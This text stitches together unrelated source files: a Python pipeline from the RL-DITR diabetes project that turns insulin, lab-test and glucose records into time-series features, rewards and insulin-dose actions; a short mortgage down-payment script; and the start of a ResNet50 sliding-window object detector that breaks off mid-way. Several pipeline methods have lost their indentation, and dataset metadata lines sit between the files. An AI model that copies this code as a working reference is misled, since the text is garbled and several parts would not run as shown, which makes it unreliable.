        df_insulin_meta, insulin2group, insulin_list = self._get_insulin_meta(insulin_meta_path)
        df_insulin = read_csv_or_df(input_path)
        df_insulin_output = df_insulin
        # remove doctor's advice with unreasonable values
        df_insulin_output = df_insulin_output[df_insulin_output['value'].between(1, 50)]
        df_insulin_output = df_insulin_output[df_insulin_output['drug_group'].isin(['胰岛素', 'insulin'])]
        # supplementary drug category Insulin
        if df_insulin_output['key'].isin(['insulin_group']).sum() == 0:  # avoid duplicate additions
            df_insulin_output2 = df_insulin_output.copy()
            df_insulin_output2['key'] = 'insulin_group'
            # Encode the category vocabulary into the key_type, e.g. 'cat4(无,...)'.
            df_insulin_output2['key_type'] = 'cat{}({})'.format(len(insulin_list), ','.join(insulin_list))
            df_insulin_output2['key_group'] = 'insulin'
            df_insulin_output2['value'] = df_insulin_output2['drug_name'].map(insulin2group)
            if df_insulin_output2['value'].isna().sum() > 0:
                df_na = df_insulin_output2[df_insulin_output2['value'].isna()]
                # df_insulin_output2['value'] = df_insulin_output2['value'].fillna('premixed insulin')
                df_insulin_output2['value'] = df_insulin_output2['value'].fillna('预混胰岛素')
                names = list(df_na['drug_name'].unique())
                if isinstance(input_path, str) or isinstance(input_path, Path):
                    logger.warning(f"insulin mapping missing, unknown short/premixed/long {input_path} {names}")
                else:
                    logger.warning(f"insulin mapping missing, unknown short/premixed/long {df_na.head(2)} {names}")
            df_insulin_output = pd.concat([df_insulin_output, df_insulin_output2])
        # remove missing values
        df_insulin_output = df_insulin_output.dropna(subset=['value'])
        logger.info("insulin information processing completed, %s items in total" % df_insulin_output.shape[0])
        return self._std_df_output(df_insulin_output, output_path)
    @lru_cache(10)
    def _get_test_meta(self, path):
        '''
        Load the lab-test mapping sheet (cached per path).

        Returns:
            df_test_meta: all inspection information
            key2name: (key_map, local test name) -> canonical feature_name
            name2loinc: canonical feature_name -> LOINC code
        '''
        df_test_meta = pd.read_excel(path)
        # Fixed meta columns; every remaining column is a per-site local-name column.
        cols_test_meta = 'system feature_name loinc component short_name'.split()
        cols_local = df_test_meta.columns.drop(cols_test_meta)
        # Melt the wide local-name columns into (key_map, local_name) rows.
        key2name = df_test_meta.melt(id_vars='feature_name', value_vars=cols_local, var_name='key_map',
                                     value_name='local_name')
        key2name = key2name.drop_duplicates(subset=['key_map', 'local_name'])
        key2name = key2name.dropna()
        key2name = key2name.set_index(['key_map', 'local_name'])['feature_name']
        name2loinc = df2map(df_test_meta, 'feature_name', 'loinc')
        return df_test_meta, key2name, name2loinc
def pipeline1_test(self, input_path, output_path, test_meta_path):
'''
process the inspection information in document input_path
'''
df_test_meta, key2name, name2loinc = self._get_test_meta(test_meta_path)
df_test = read_csv_or_df(input_path)
df_test_output = df_test
# inspection index naming standardization
temp = pd.Series(zip(df_test_output['key_map'], df_test_output['key']))
temp = temp.map(key2name)
temp = temp.fillna(df_test_output['key'])
df_test_output['key'] = temp
df_test_output['comment'] = df_test_output['key'].map(name2loinc)
logger.info("inspection information processing completed, %s items in total" % df_test_output.shape[0])
return self._std_df_output(df_test_output, output_path)
    def workflow1_merge(self, input_dir, output_path,
                        drug_meta_path, insulin_meta_path, test_meta_path,
                        pipeline=['base', 'sym', 'diag', 'drug', 'insulin', 'glu', 'test'],
                        mapping=True,
                        ):
        '''
        Integrate one patient's raw sparse tables (base / symptoms /
        diagnoses / drugs / insulin / glucose / lab tests) into one frame.

        input_dir: either a directory containing the ``*.sparse.csv`` files,
            or a 7-sequence of (base, glu, diag, test, drug, insulin, sym)
            sources (paths or DataFrames).
        output_path: None -> return the DataFrame; 'print' -> stdout;
            otherwise written as CSV (suffix forced to '.csv').
        pipeline: which source kinds to include.
        mapping: when True, drug/insulin/test tables are first normalised
            through their pipeline1_* mappers.
        '''
        logger.info("start merging patient information")
        if isinstance(input_dir, str) or isinstance(input_dir, Path):
            input_dir = Path(input_dir)
            path_base = input_dir / 'base.sparse.csv'
            path_sym = input_dir / 'sym.sparse.csv'
            path_diag = input_dir / 'diag.sparse.csv'
            path_drug = input_dir / 'drug.sparse.csv'
            path_insulin = input_dir / 'insulin.sparse.csv'
            path_glu = input_dir / 'glu.sparse.csv'
            path_test = input_dir / 'test.sparse.csv'
        else:
            # In-memory mode: sources supplied directly in a fixed order.
            path_base, path_glu, path_diag, path_test, path_drug, path_insulin, path_sym = input_dir
        dfs = []
        # Re-check chooses between path mode (where .exists() guards each
        # file) and in-memory mode (no existence checks possible).
        if isinstance(input_dir, str) or isinstance(input_dir, Path):
            input_dir = Path(input_dir)
            if ('base' in pipeline) and path_base.exists():
                logger.info("process base")
                df_base = read_csv_or_df(path_base)
                dfs += [df_base]
            if ('sym' in pipeline) and path_sym.exists():
                logger.info("process sym")
                df_sym = read_csv_or_df(path_sym)
                dfs += [df_sym]
            if ('glu' in pipeline) and path_glu.exists():
                logger.info("process glu")
                df_glu = read_csv_or_df(path_glu)
                dfs += [df_glu]
            if ('diag' in pipeline) and path_diag.exists():
                df_diag = read_csv_or_df(path_diag)
                dfs += [df_diag]
            if ('drug' in pipeline) and path_drug.exists():
                logger.info("process drug")
                if mapping:
                    df_drug = self.pipeline1_drug(path_drug, None, drug_meta_path=drug_meta_path)
                else:
                    df_drug = read_csv_or_df(path_drug)
                dfs += [df_drug]
            if ('insulin' in pipeline) and path_insulin.exists():
                logger.info("process insulin")
                if mapping:
                    df_insulin = self.pipeline1_insulin(path_insulin, None, drug_meta_path=drug_meta_path,
                                                        insulin_meta_path=insulin_meta_path)
                else:
                    df_insulin = read_csv_or_df(path_insulin)
                dfs += [df_insulin]
            if ('test' in pipeline) and path_test.exists():
                logger.info("process test")
                if mapping:
                    df_test = self.pipeline1_test(path_test, None, test_meta_path=test_meta_path)
                else:
                    df_test = read_csv_or_df(path_test)
                dfs += [df_test]
        else:
            # In-memory sources: mapping is always applied for drug/insulin/test.
            if ('base' in pipeline):
                df_base = read_csv_or_df(path_base)
                dfs += [df_base]
            if ('sym' in pipeline):
                df_sym = read_csv_or_df(path_sym)
                dfs += [df_sym]
            if ('glu' in pipeline):
                df_glu = read_csv_or_df(path_glu)
                dfs += [df_glu]
            if ('diag' in pipeline):
                df_diag = read_csv_or_df(path_diag)
                dfs += [df_diag]
            if ('drug' in pipeline):
                df_drug = self.pipeline1_drug(path_drug, None, drug_meta_path=drug_meta_path)
                dfs += [df_drug]
            if ('insulin' in pipeline):
                df_insulin = self.pipeline1_insulin(path_insulin, None, drug_meta_path=drug_meta_path,
                                                    insulin_meta_path=insulin_meta_path)
                dfs += [df_insulin]
            if ('test' in pipeline):
                df_test = self.pipeline1_test(path_test, None, test_meta_path=test_meta_path)
                dfs += [df_test]
        if len(dfs) == 0:
            logger.warning(f"{input_dir} no records were found for this patient")
            df = pd.DataFrame()
        else:
            df = pd.concat(dfs)
        if output_path is None:
            return df
        elif output_path == 'print':
            print(df)
        else:
            output_path = Path(output_path).with_suffix('.csv')
            output_path.parent.mkdir(parents=True, exist_ok=True)
            df.to_csv(output_path, index=False)
def pipeline2ext_add_option(self, input_path, output_path, scheme, start_time, days):
'''
add action option
'''
df_sample = read_csv_or_df(input_path)
df_option = make_drug_option(scheme, start_time, days)
df_sample = pd.concat([df_sample, df_option])
return self._std_df_output(df_sample, output_path)
def pipeline2_tnorm(self, input_path, output_path, tnorm_mode):
'''
time point normalization
'''
df_sample = read_csv_or_df(input_path)
df_sample_tnorm = df_sample
if tnorm_mode == 'arm':
times_bin = '04:30:00 10:00:00 15:00:00 18:50:00 23:59:59'.split()
times_norm = '06:00:00 10:30:00 16:30:00 21:00:00'.split()
labels = '0 2 4 6'.split()
elif tnorm_mode == 'fulltime':
times_bin = '04:30:00 08:11:00 09:30:00 12:11:00 15:00:00 18:00:00 20:00:00 23:59:59'.split()
times_norm = '06:00:00 08:30:00 10:30:00 13:00:00 16:30:00 19:00:00 21:00:00'.split()
labels = '0 1 2 3 4 5 6'.split()
df_sample_tnorm['datetime'] = pd.to_datetime(df_sample_tnorm['datetime'])
sr_datetime, sr_datetime_label = datetime_time_norm(df_sample_tnorm['datetime'], times_bin, times_norm, labels)
df_sample_tnorm['datetime_norm'] = sr_datetime
df_sample_tnorm['timegroup'] = sr_datetime_label
df_sample_tnorm = move_cols_follow(df_sample_tnorm, 'datetime', ['datetime_norm', 'timegroup'])
logger.info("time point normalization completed")
return self._std_df_output(df_sample_tnorm, output_path)
    @lru_cache(10)
    def _get_feat_meta(self, path):
        '''
        Load the feature metadata table (cached per path) and split it by
        continuous vs. categorical key_type.

        Returns (df_feat_meta, df_meta_to_cont, df_meta_to_cat).

        NOTE(review): lru_cache requires hashable arguments; DataFrames are
        unhashable, so the isinstance(path, pd.DataFrame) branch would raise
        TypeError at the cache lookup before it is reached — callers must
        pass a path. Confirm before relying on DataFrame input here.
        '''
        if isinstance(path, pd.DataFrame):
            df_feat_meta = path
        else:
            df_feat_meta = pd.read_csv(path)
        # Continuous features have key_type == 'cont'; categorical ones
        # start with 'cat' (e.g. 'cat4(...)').
        df_meta_to_cont = df_feat_meta[df_feat_meta['key_type'] == 'cont']
        df_meta_to_cat = df_feat_meta[df_feat_meta['key_type'].str.contains('^cat')]
        return df_feat_meta, df_meta_to_cont, df_meta_to_cat
    def pipeline2_ftcrop(self, input_path, output_path, feat_meta_path,
                         keygroup_specific=[], dt_deltas=('14D', '14D'),
                         col_datetime='datetime_norm',
                         ):
        '''
        Feature and time tailoring: derive feat_name, filter rows, and keep
        only records inside a window centred on the (optionally key-group
        restricted) median timestamp.
        '''
        df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
        df_sample = read_csv_or_df(input_path)
        # feature tailoring
        df_sample_crop = df_sample
        if not ('feat_name' in df_sample_crop):
            df_sample_crop['feat_name'] = df_sample_crop['key_group'] + '|' + df_sample_crop['key']
        # NOTE(review): feat_names is built from the frame's own values, so
        # this isin() keeps every row except those whose feat_name is NaN —
        # possibly it was meant to filter against df_feat_meta['feat_name'].
        feat_names = df_sample_crop['feat_name'].tolist() + ['insulin|insulin', 'insulin|insulin_group']
        df_sample_crop = df_sample_crop[df_sample_crop['feat_name'].isin(feat_names)]
        # time tailoring: centre the window on the median timestamp of the
        # specified key groups (or of all rows when none are given).
        if len(keygroup_specific) > 0:
            dt = df_sample_crop[col_datetime][df_sample_crop['key_group'].isin(keygroup_specific)]
        else:
            dt = df_sample_crop[col_datetime]
        dt_begin, dt_end = get_datetime_span(dt, deltas=dt_deltas)
        df_sample_crop = df_sample_crop[df_sample_crop['datetime_norm'].between(dt_begin, dt_end)]
        logger.info("feature filtering completed")
        return self._std_df_output(df_sample_crop, output_path)
    def pipeline2_ts_flatten(self, input_path, output_path,
                             max_steps=None,
                             freq='D', n_timegroup=7, max_duration='60D',
                             col_datetime='datetime_norm', col_timegroup='timegroup',
                             # col_key='key',col_value='value',col_key_type='key_type',
                             col_key_group='key_group', col_key='key', col_value='value',
                             ):
        '''
        Pivot sparse records into one row per (datetime, timegroup) step.

        Needs to be completed before time flattening:
        - time point normalization
        - feature filtering
        - time span truncation

        max_steps: optional cap on the number of steps; the kept window is
            centred on the data-dense region (see below).
        max_duration: hard limit on the covered span; exceeding it raises.
        '''
        df_sample = read_csv_or_df(input_path)
        df_ts = df_sample
        df_ts[col_datetime] = pd.to_datetime(df_ts[col_datetime])
        # rename features(name + type)
        df_ts[col_key] = df_ts[col_key_group] + '|' + df_ts[col_key]
        # flatten features: first value wins for duplicate (step, feature) cells
        df_ts = df_ts.pivot_table(index=[col_datetime, col_timegroup], columns=col_key, values=col_value,
                                  aggfunc='first')
        df_ts = df_ts.reset_index()
        df_ts.columns.name = None
        # sequential normalization
        tmin, tmax = df_ts[col_datetime].min(), df_ts[col_datetime].max()
        max_duration = pd.Timedelta(max_duration)
        if (tmax - tmin).days > max_duration.days:
            raise Exception(f'Data duration {tmax - tmin} exceeds the limitation of {max_duration}')
        if len(df_ts) > 0:
            df_ts = ts_complete(df_ts, col_datetime, col_timegroup, freq, n_timegroup)
            df_ts = df_ts.reset_index(drop=False)
        # truncation: centre a max_steps window on the weighted centre of
        # mass of per-row non-null counts, snapped to day boundaries.
        if max_steps is not None:
            n_interval = n_timegroup
            if n_interval is None:
                n_interval = 1
            weight = df_ts.notna().sum(axis=1) - 3
            weight = weight / max(weight.sum(), 1)
            pos = (weight * np.arange(len(weight))).sum()
            index_s = max(0, int(pos - max_steps // 2))
            index_s = index_s // n_interval * n_interval
            index_e = min(index_s + max_steps, len(df_ts))
            df_ts = df_ts.iloc[index_s:index_e]
        logger.info("time flattening completed")
        return self._std_df_output(df_ts, output_path)
    def workflow2_ts(self, input_path, output_path, feat_meta_path, keygroup_specific=['insulin', 'glu'],
                     dt_deltas=('14D', '14D')):
        '''
        Normalise features and time into a flat sequential feature table:
        time-normalise (drug/insulin on the 4-slot 'arm' grid, everything
        else on the 7-slot 'fulltime' grid), crop, flatten, then coerce
        columns to numeric where possible.
        '''
        logger.info("start acquiring sequential feature")
        df_sample = read_csv_or_df(input_path)
        key_groups = ['drug', 'insulin']
        df_sample_base = df_sample[~df_sample['key_group'].isin(key_groups)].copy()
        df_sample_drugs = df_sample[df_sample['key_group'].isin(key_groups)].copy()
        df_sample_base = self.pipeline2_tnorm(df_sample_base, None, tnorm_mode='fulltime')
        df_sample_drugs = self.pipeline2_tnorm(df_sample_drugs, None, tnorm_mode='arm')
        df_sample = pd.concat([df_sample_base, df_sample_drugs])
        df_sample = self.pipeline2_ftcrop(df_sample, None, feat_meta_path=feat_meta_path,
                                          keygroup_specific=keygroup_specific, dt_deltas=dt_deltas,
                                          col_datetime='datetime_norm', )
        df_sample = self.pipeline2_ts_flatten(df_sample, None, col_datetime='datetime_norm')
        for col in df_sample.columns:
            if df_sample[col].dtype.name in ['int64', 'datetime64[ns]']:
                continue
            # NOTE(review): errors='ignore' is deprecated in recent pandas —
            # confirm the pinned pandas version before upgrading.
            df_sample[col] = pd.to_numeric(df_sample[col], errors='ignore')
        return self._std_df_output(df_sample, output_path)
    def pipeline31_fillna(self, input_path, output_path, feat_meta_path, return_mask=False):
        '''
        Fill missing feature values: columns marked interp='ffill' in the
        meta are forward- then backward-filled; every remaining NaN becomes 0.

        return_mask: when True, also return the pre-fill notna() mask
            (df_case, df_mask) instead of using the standard output sink.
        '''
        logger.info("fill feature with zero")
        df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
        df_sample = read_csv_or_df(input_path)
        df_case = df_sample
        # Align columns to the full feature list (missing features -> all-NaN).
        df_case = df_case.reindex(columns=df_feat_meta['feat_name'])
        df_mask = df_case.notna()
        for _, sr_col in df_feat_meta.iterrows():
            col = sr_col['feat_name']
            interp = sr_col['interp']
            feat_type = sr_col['key_type']  # NOTE(review): read but unused
            val = df_case[col]
            if interp == 'ffill':
                val = val.interpolate(method='ffill')
                val = val.interpolate(method='bfill')
            val = val.fillna(0)
            df_case[col] = val
        if return_mask:
            return df_case, df_mask
        else:
            return self._std_df_output(df_case, output_path)
    def pipeline31_delay(self, input_path, output_path, feat_meta_path):
        # Delayed observation: shift each feature forward by its per-feature
        # 'delay' (in steps), zero-padding the start — models the lag before
        # a measurement becomes observable.
        # NOTE(review): output_path is accepted but unused; the frame is
        # always returned in memory.
        df_sample = read_csv_or_df(input_path)
        df_case = df_sample
        df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
        for _, sr_col in df_feat_meta[['feat_name', 'delay']].iterrows():
            col = sr_col['feat_name']
            delay = sr_col['delay']
            val = df_case[col]
            if (delay > 0) and (len(val) > 0):
                v = np.concatenate([np.zeros([delay], dtype=val.dtype), val.values[:-delay]])
                val = pd.Series(v, index=val.index)
            df_case[col] = val
        return df_case
    def pipeline31_onehot(self, input_path, output_path, feat_meta_path, feature_reindex=True):
        '''
        Expand categorical features into one-hot columns (continuous ones
        pass through unchanged).

        feature_reindex: when True, force the full meta feature list
            (absent features become all-NaN/zero columns); when False only
            the columns present in the input are processed.
        '''
        logger.info("expand discrete features")
        df_sample = read_csv_or_df(input_path)
        df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
        df_case = df_sample
        feats = []
        if feature_reindex:
            feats += [df_case.reindex(columns=df_meta_to_cont['feat_name'])]
        else:
            cols_cont = df_case.columns[df_case.columns.isin(df_meta_to_cont['feat_name'])]
            feats += [df_case.reindex(columns=cols_cont)]
        if feature_reindex:
            df_meta_to_cat_t = df_meta_to_cat
        else:
            df_meta_to_cat_t = df_meta_to_cat[df_meta_to_cat['feat_name'].isin(df_case.columns)]
        for _, sr_col in df_meta_to_cat_t.iterrows():
            col = sr_col['feat_name']
            vals = df_case[col]
            if not pd.isna(sr_col['cat']):
                # Map category labels to ordinal ids from the comma-separated vocab.
                cats = sr_col['cat'].split(',')
                cat2id = {c: i for i, c in enumerate(cats)}
                vals = vals.map(cat2id)
            # One column per category id 0..n_dim-1, named '<feat>_<id>'.
            vals = pd.Categorical(vals, categories=np.arange(sr_col['n_dim']))
            vals = pd.get_dummies(vals)
            vals = vals.add_prefix(col + '_')
            feats += [vals]
        df_case = pd.concat(feats, axis=1)
        return self._std_df_output(df_case, output_path)
    def workflow31_preprocess(self, input_path, output_path, feat_meta_path,
                              add_mask=False,
                              add_timegroup=False, col_timegroup='timegroup', n_timegroup=7,
                              ):
        '''
        Sequential feature preprocessing (filling, discrete features, one hot):
        - fill missing value
        - categorical feature expansion
        - optional observability-mask and timegroup one-hot columns
        - the time dimension remains unchanged, the feature dimension changes
        '''
        logger.info("start sequential feature preprocessing")
        df_case = read_csv_or_df(input_path)
        df_feat, df_mask = self.pipeline31_fillna(df_case, None, feat_meta_path, return_mask=True)
        df_feat = self.pipeline31_onehot(df_feat, None, feat_meta_path, feature_reindex=True)
        # add mask feature: 1 where the raw value was observed, 0 where imputed
        if add_mask:
            df_feat = pd.concat([df_feat, df_mask.add_suffix('_notna').astype('int')], axis=1)
        # add timegroup tag feature (one-hot of the intra-day slot)
        if add_timegroup:
            df_time = pd.Categorical(df_case[col_timegroup], categories=np.arange(n_timegroup))
            df_time = pd.get_dummies(df_time)
            df_feat = pd.concat([df_feat, df_time.add_prefix('timegroup_').astype('int')], axis=1)
        return self._std_df_output(df_feat, output_path)
def pipeline32_reward(self, input_path, output_path, col_glu='glu|glu', reward_dtype='risk', gamma=0.9):
'''
add reward return
'''
df_sample = read_csv_or_df(input_path)
df_case_labeled = df_sample
df_case_labeled['reward'] = glu2reward(df_case_labeled[col_glu], dtype=reward_dtype)
df_case_labeled['return'] = reward2return(df_case_labeled['reward'], gamma=gamma)
df_case_labeled['_col_glu'] = df_case_labeled[col_glu]
return self._std_df_output(df_case_labeled, output_path)
    def pipeline32_action(self, input_path, output_path,
                          col_insulin_dose='insulin|insulin', insulin_max=49,
                          col_insulin_cat='insulin|insulin_group', option_max=4,
                          ):
        '''
        Add RL action columns:
        - 'action': insulin dose, NaN -> 0, clipped to [0, insulin_max]
        - 'option': insulin category id mapped to {1: short/rapid,
          2: medium/premixed, 3: long}, unknown -> 0, clipped to
          [0, option_max]
        Chinese keys are the category labels produced by pipeline1_insulin.
        '''
        option_map = {
            '短效胰岛素': 1,
            '速效胰岛素': 1,
            '中效胰岛素': 2,
            '预混胰岛素': 2,
            '长效胰岛素': 3,
            'Short-acting insulin': 1,
            'Rapid-acting insulin': 1,
            'Medium-acting insulin': 2,
            'Premixed insulin': 2,
            'Long-acting insulin': 3,
            'short': 1,
            'rapid': 1,
            'medium': 2,
            'premixed': 2,
            'long': 3,
        }
        df_sample = read_csv_or_df(input_path)
        df_case_labeled = df_sample
        if (col_insulin_dose not in df_case_labeled) and (col_insulin_cat not in df_case_labeled):
            # Both insulin columns missing: warn, then fall through so the
            # zero-valued defaults below are still written.
            logger.warning(f"no insulin data input")
            pass
        if col_insulin_dose in df_case_labeled:
            # interpolate dose with zero and normalize it
            df_case_labeled['action'] = df_case_labeled[col_insulin_dose].fillna(0).astype('int')
            df_case_labeled['action'] = df_case_labeled['action'].clip(0, insulin_max)
        else:
            df_case_labeled['action'] = 0
        if col_insulin_cat in df_case_labeled:
            # map, supplement, and normalize options
            df_case_labeled['option'] = df_case_labeled[col_insulin_cat].map(option_map).fillna(0).astype('int')
            df_case_labeled['option'] = df_case_labeled['option'].clip(0, option_max)
        else:
            df_case_labeled['option'] = 0
        return self._std_df_output(df_case_labeled, output_path)
    def pipeline32_glu_label(self, input_path, output_path,
                             col_glu='glu|glu',
                             glu_min=3.9, glu_max=10,
                             n_lookaheads=[7, 14, 21], labels=['glu<3', 'glu>11', '3>glu>11']
                             ):
        '''
        Add glucose-event indicator columns and lookahead labels.

        Per-step events (NaN where glucose is missing):
          'glu<3'    : hypoglycemia (glucose below glu_min)
          'glu>11'   : hyperglycemia (glucose above glu_max)
          '3>glu>11' : out of the [glu_min, glu_max] range
        For each event and each horizon h in n_lookaheads, a column
        'label_<event>_h<h>' marks whether the event occurs within the next
        h steps (current step excluded); labels too close to the end of the
        series (less than h//2 steps remaining) are masked with NaN.
        '''
        df_sample = read_csv_or_df(input_path)
        df_case_labeled = df_sample
        df_case_labeled['glu<3'] = (df_case_labeled[col_glu] < glu_min).astype('int')
        df_case_labeled['glu<3'] = df_case_labeled['glu<3'].mask(df_case_labeled[col_glu].isna(), np.nan)
        df_case_labeled['3>glu>11'] = (~df_case_labeled[col_glu].between(glu_min, glu_max)).astype('int')
        df_case_labeled['3>glu>11'] = df_case_labeled['3>glu>11'].mask(df_case_labeled[col_glu].isna(), np.nan)
        df_case_labeled['glu>11'] = (df_case_labeled[col_glu] > glu_max).astype('int')
        df_case_labeled['glu>11'] = df_case_labeled['glu>11'].mask(df_case_labeled[col_glu].isna(), np.nan)
        for col_env in labels:
            sr_event = df_case_labeled[col_env]
            for n_lookahead in n_lookaheads:  # lookahead n time points
                # Reverse + rolling sum + closed='left' == "any event in the
                # next n_lookahead steps, excluding the current one".
                temp = sr_event[::-1].rolling(n_lookahead, 1, closed='left').sum()[::-1]
                temp = (temp > 0).astype('int')
                col_target = f'label_{col_env}_h{n_lookahead}'
                df_case_labeled[col_target] = temp
                # at the end , the length of time is at least greater than the half
                df_case_labeled[col_target] = df_case_labeled[col_target].mask(
                    df_case_labeled['step'] > (len(df_case_labeled) - n_lookahead // 2), np.nan)
        return self._std_df_output(df_case_labeled, output_path)
def workflow2_merge_ts(self, input_dir, output_path,
drug_meta_path, insulin_meta_path, test_meta_path, feat_meta_path,
pipeline=['base', 'sym', 'diag', 'drug', 'insulin', 'glu', 'test'],
skip_empty=False, mapping=True,
):
try:
df_sample = self.workflow1_merge(input_dir, None, drug_meta_path, insulin_meta_path, test_meta_path,
mapping=mapping)
# print(df_sample)
df_sample = self.workflow2_ts(df_sample, None, feat_meta_path)
if skip_empty and (len(df_sample) == 0):
output_path = 'skip'
return self._std_df_output(df_sample, output_path, with_suffix='.csv')
except Exception as e:
print(input_dir)
print(e)
return None
    def workflow_total(self, input_dir, output_dir, meta_dir):  # for debug
        # End-to-end debug run over one patient directory, writing each
        # intermediate stage to output_dir. Meta file names are the fixed
        # Chinese-titled spreadsheets shipped alongside the pipeline.
        meta_dir = Path(meta_dir)
        # drug_meta_path = meta_dir / '20210607 list of hypoglycemic drugs.xlsx'
        drug_meta_path = meta_dir / '20210607降糖药列表.xlsx'
        # insulin_meta_path = meta_dir / '20220216 insulin classification.xlsx'
        insulin_meta_path = meta_dir / '20220216胰岛素分类类别.xlsx'
        # test_meta_path = meta_dir / '20220117 inspection indicators mapping table.xlsx'
        test_meta_path = meta_dir / '20220117检验指标映射表.xlsx'
        feat_meta_path = meta_dir / 'task.columns.csv'
        # NOTE(review): the trailing comma makes `pipeline` a 1-tuple holding
        # the list; harmless here since neither `pipeline` nor `skip_empty`
        # is used below.
        pipeline = ['base', 'sym', 'diag', 'drug', 'insulin', 'glu', 'test'],
        skip_empty = False
        output_dir = Path(output_dir)
        output_dir.mkdir(parents=True, exist_ok=True)
        output_path1 = output_dir / 'data.1.1.merge.csv'
        output_path2 = output_dir / 'data.2.1.ts.csv'
        output_path3 = output_dir / 'data.3.1.preprocess.csv'
        output_path4 = output_dir / 'data.4.1.label.csv'
        self.workflow1_merge(input_dir, output_path1, drug_meta_path, insulin_meta_path, test_meta_path)
        self.workflow2_ts(output_path1, output_path2, feat_meta_path)
        self.workflow31_preprocess(output_path2, output_path3, feat_meta_path, add_mask=True, add_timegroup=True,
                                   col_timegroup='timegroup', n_timegroup=7)
        df_temp = self.pipeline32_reward(output_path3, None)
        self.pipeline32_action(df_temp, output_path4)
    def batch(self, job, data_dir, output_root, skip_exist=False, filelist=None, file_suffix='', hash_split=None,
              n_splits=None, **kargs):
        '''
        batch processing

        Args:
        --------------------
        job: str
            task name, one of the workflow_* entry points below
        data_dir: str
            directory to be processed
        output_root: str
            output path
        skip_exist: bool (default=False)
            whether to skip it if the file already exists
        filelist: optional newline-separated list of relative paths to
            process instead of globbing data_dir
        file_suffix: glob suffix for file-input jobs / output suffix for
            dir-input jobs
        hash_split, n_splits: shard selector — only names whose stable
            hash (hash_func) modulo n_splits equals hash_split are processed
        num_workers: int (default=1)
            multiprocess processing (-1 represents the use of all cores;
            taken from self._num_workers set in __init__)
        '''
        func = {
            'workflow1_merge': self.workflow1_merge,
            'workflow2_ts': self.workflow2_ts,
            'workflow2_merge_ts': self.workflow2_merge_ts,
            'workflow31_preprocess': self.workflow31_preprocess,
        }[job]
        if job in ['workflow2_ts', 'workflow31_preprocess']:
            mode = 'file_input'  # input is a file
        else:
            mode = 'dir_input'  # input is a folder
        data_dir = Path(str(data_dir))
        output_root = Path(str(output_root))
        output_root.mkdir(parents=True, exist_ok=True)
        # Bookkeeping for batch mode (stored on the instance).
        self._data_dir = data_dir
        self._output_dir = output_root
        self._is_batch_mode = True
        from multiprocessing import Pool
        num_workers = self._num_workers
        if num_workers < 0:
            num_workers = None  # Pool(None) uses all available cores
        tasks = []
        if mode == 'file_input':  # expand file
            if filelist is None:
                paths = data_dir.glob(f'**/*{file_suffix}')
                paths = list(paths)
            else:
                paths = Path(filelist).read_text().strip().splitlines()
                paths = [data_dir / Path(p) for p in paths]
            for path in tqdm(paths):
                if path.is_dir():
                    continue
                filename = path.name
                if n_splits is None:
                    pass
                else:
                    # Stable filename-hash sharding across parallel jobs.
                    hashcode = hash_func(filename)
                    if hash_split != (hashcode % n_splits):
                        continue
                output_dir = output_root / path.relative_to(data_dir)
                output_dir = output_dir.parent / filename
                if skip_exist and output_dir.exists():
                    continue
                task = (func, path, output_dir, kargs)
                tasks += [task]
        elif mode == 'dir_input':  # directory to file
            if filelist is None:
                paths = data_dir.glob(f'**')
                paths = list(paths)
            else:
                paths = Path(filelist).read_text().strip().splitlines()
                paths = [data_dir / Path(p) for p in paths]
            for path in tqdm(paths):
                if not path.is_dir():
                    continue
                dirname = path.name
                if n_splits is None:
                    pass
                else:
                    hashcode = hash_func(dirname)
                    if hash_split != (hashcode % n_splits):
                        continue
                output_path = output_root / path.relative_to(data_dir)
                output_path = output_path.with_suffix(file_suffix)
                if skip_exist and output_path.exists():
                    continue
                task = (func, path, output_path, kargs)
                tasks += [task]
        # Fan the tasks out over the worker pool.
        with Pool(num_workers) as pool:
            for _ in tqdm(pool.imap_unordered(func_args_output_helper, tasks), total=len(tasks)):
                pass
# CLI entry point: python-fire exposes every DiabetesPipeline method
# (workflow_total, batch, ...) as a command-line subcommand.
if __name__ == '__main__':
    fire.Fire(DiabetesPipeline)
| rlditr23/RL-DITR | ts/datasets/pipe.py | pipe.py | py | 42,396 | python | en | code | 10 | github-code | 13 |
# Mortgage down-payment calculator: buyers with good credit put 10% down,
# everyone else puts 20% down.
price = 1000000
is_goodcredit = True  # dead initial assignment to False removed
print(is_goodcredit)
if is_goodcredit:
    print("Put down price by 10%")
    downpayment = 0.1 * price
    price -= 0.1 * price
else:
    print("Put down price by 20%")
    # BUG FIX: the down payment must match the 20% rate quoted above
    # (was 0.1 * price).
    downpayment = 0.2 * price
    price -= 0.2 * price
print(f'Price:{price}')
print(f'Down payment:{downpayment}')
73370907856 | from tensorflow.keras.applications import ResNet50
from tensorflow.keras.applications.resnet import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.applications import imagenet_utils
from imutils.object_detection import non_max_suppression
from detection_helper import sliding_window
from detection_helper import image_pyramid
import numpy as np
import argparse
import imutils
import time
import cv2
# Object detection built from an image classifier: slide a fixed-size window
# over an image pyramid, classify every ROI with ResNet50, then group and
# de-duplicate the confident detections with non-maxima suppression.
#construct the argument parse and parse the argument
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--image', required = True, help = 'path to the input image')
ap.add_argument('-s', '--size', type = str, default = '(200, 150)', help = 'ROI size in pixels')
ap.add_argument('-c', '--min-conf', type = float, default = 0.9, help = 'min probability to filter weak detections')
ap.add_argument('-v', '--visualize', type = int, default = -1, help='whether or not show extra visualization for debugging')
args = vars(ap.parse_args())
#initialize variables for object detection
WIDTH = 600
PYR_SCALE = 1.5
WIN_STEP = 16
# NOTE(review): eval() on a CLI argument executes arbitrary code;
# ast.literal_eval would parse the "(w, h)" tuple safely.
ROI_SIZE = eval(args['size'])
INPUT_SIZE = (224, 224)
#loading network weights
print('Loading network ...')
model = ResNet50(weights = 'imagenet', include_top = True)
#load input image, resize it and then grab its dimensions
orig = cv2.imread(args['image'])
orig = imutils.resize(orig, width = WIDTH)
(H, W) = orig.shape[:2]
#initialize image pyramid
pyramid = image_pyramid(orig, scale = PYR_SCALE, minSize = ROI_SIZE)
#initializing two lists, one for ROIs generated from image pyramid and sliding window, and another to store
#(x, y) coordinates of ROI
rois = []
locs = []
#measuring how much time it takes to loop over image pyramid and sliding window
